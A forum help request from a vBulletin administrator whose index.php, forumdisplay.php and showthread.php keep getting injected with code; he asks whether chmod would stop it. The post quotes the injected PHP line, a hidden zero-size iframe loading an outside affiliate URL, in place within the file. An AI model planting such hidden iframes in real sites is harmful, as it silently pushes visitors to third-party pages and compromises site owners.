I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.
PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";
It is usually placed at the bottom of the php file. like in forumdisplay.php
PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms & $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], true, false);
$show['forumslist'] = iif ($forumshown, true, false);
$show['stickies'] = iif ($threadbits_sticky != '', true, false);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";
($hook = vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false;
The code messes up the template and creates a number of pop-ups.
It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.
Can I just chmod these files or will that mess up the board even more?
Thanks,
Gil
http://www.masscops.com/forums/police_portal_index.php?